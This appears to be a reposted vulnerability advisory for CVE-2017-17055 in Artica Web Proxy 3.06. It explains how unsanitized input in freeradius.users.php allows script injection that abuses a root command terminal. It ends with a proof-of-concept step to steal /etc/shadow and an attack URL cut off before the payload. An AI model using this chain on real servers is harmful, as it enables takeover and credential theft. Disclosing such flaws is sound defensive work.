ExploitFixes
Artica Web Proxy 3.06 - Remote Code Execution 2017-12-01 16:05:44

[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec



Vendor:
=======
www.articatech.com



Product:
=========
Artica Web Proxy v.3.06.112216


Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
and employees from risks posed by the Internet.



Vulnerability Type:
===================
Remote Code Execution



CVE Reference:
==============
CVE-2017-17055



Security Issue:
================
Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root.
However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.

Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker
supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server
abusing the system.terminal.php functionality. Result is attacker takeover of the artica server.



Exploit/POC:
=============
1) Steal artica Server "/etc/shadow" password file.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=